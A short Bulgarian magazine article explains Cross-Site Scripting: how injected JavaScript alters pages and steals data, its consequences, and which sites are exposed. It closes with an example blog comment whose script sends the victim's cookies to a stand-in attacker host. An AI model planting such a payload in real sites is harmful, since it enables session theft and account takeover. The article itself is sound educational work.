Заплахи към уеб приложения – XSS (Cross-Site Scripting)

Следващата заплаха към уеб приложенията, която ще бъде разгледана е Cross-Site Scripting.
“Cross-Site Scripting” е изключително опасна и често срещана атака, при която на базата на технологичен пропуск злонамерените лица инжектират на сървъра JavaScript код, позволяващ да се промени съдържанието на уеб приложението, както и да се получи неоторизиран достъп до съхранена на сървъра информация. Хакерът не атакува директно избраната жертва, а използва този пропуск като междинен механизъм за изпращането на зловреден код.
Злонамерените скриптове, използвани при XSS, могат да получат достъп до данни на потребителя, да създадат нови HTTP заявки към посочени от хакерите цели, както и да модифицират съдържанието на HTML страниците.
XSS атака може да доведе до следните нежелани последствия:
- Кражба на потребителски профили;
- Достъп до историята на въведени в браузъра на целевия потребител адреси;
- Достъп до клипборда (clipboard) на операционната система;
- Ефективен отдалечен контрол на браузъра на атакувания потребител;
- Сканиране на приложения и системи;
- Кражба на бисквитки на потребителя (пренасочване на браузъра към предварително зададен от хакера URL);
- Модифициране на страници за въвеждане на данни и други.
При този тип неправомерен достъп, застрашени са всички сайтове, които визуализират входяща информация. Такива са блогове, форуми, книги за гости, приложенията за електронна поща. Ако тази входяща информация не е правилно валидирана, се получава уязвимост от XSS атаки.
Пример за този подход е успешно публикуване на следния коментар в блог или форум:
<script>
document.location = ‘http://evil.example.com/steal.php?cookies=’ + document.cookie
</script>
Статията е публикувана в брой 109 на сп. Българска наука: тук!
Абонирайте се за списанието тук!
